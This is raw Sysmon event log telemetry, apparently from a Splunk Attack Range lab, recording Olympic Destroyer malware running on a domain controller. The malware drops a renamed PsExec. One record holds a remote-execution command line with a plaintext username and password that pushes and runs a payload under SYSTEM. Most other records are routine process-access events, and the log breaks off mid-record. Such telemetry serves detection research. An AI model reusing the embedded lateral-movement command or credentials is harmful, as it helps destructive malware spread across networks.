10:56:47.983{C8EA50B7-12EF-6216-8D05-000000003802}5288C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000291316Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:47.983{C8EA50B7-12E6-6216-4B05-000000003802}67926872C:\Temp\olympic_destroyer.exe{C8EA50B7-12EF-6216-8F05-000000003802}6252C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4985|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000291315Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:47.985{C8EA50B7-12EF-6216-8F05-000000003802}6252C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\255.255.255.255 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000291314Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:47.983{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12EF-6216-8F05-000000003802}6252C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217714Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:49.558{4F8D34B0-12F1-6216-8504-000000003902}36763592C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217713Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:49.370{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-12F1-6216-8504-000000003902}3676C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000217712Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:49.370{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=421808F917DBD246791EFC02AF32AEC9,SHA256=16F330221F8DE56232FAAD087A7D475132B6023D30B4BD1334DDC98173F1048A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000217711Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:49.370{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217710Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:49.370{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217709Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:49.370{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217708Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:49.370{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217707Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:49.370{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217706Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:49.370{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217705Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:49.370{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217704Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:49.370{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-12F1-6216-8504-000000003902}3676C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217703Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:49.370{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217702Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:49.370{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217701Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:49.370{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-12F1-6216-8504-000000003902}3676C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000217700Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:49.371{4F8D34B0-12F1-6216-8504-000000003902}3676C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000291547Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.963{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-12F1-6216-A905-000000003802}2696C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291546Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.963{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-12F1-6216-A905-000000003802}2696C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291545Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.945{C8EA50B7-12F1-6216-A905-000000003802}26965112C:\Windows\system32\conhost.exe{C8EA50B7-12F1-6216-A605-000000003802}844C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000291544Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.929{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C456C0535716658804D59CEDE582A27E,SHA256=E0B9A9F84F8B503C4575AB4CB1DB250F07FD9BCC00668A1A3724AEC26F37A82A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000291543Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.929{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-12F1-6216-A905-000000003802}2696C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000291542Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.914{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12F1-6216-A905-000000003802}2696C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291541Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.914{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-12F1-6216-A805-000000003802}5588C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000291540Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.914{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291539Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.914{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291538Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.914{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291537Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.914{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000291536Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.914{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A3054C98AFF8ED67C85395B280DDC501,SHA256=8189CC07F83F8AB2584398A09AFA2555683E550D76AD1D03C5A0B90780B0EE1C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000291535Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 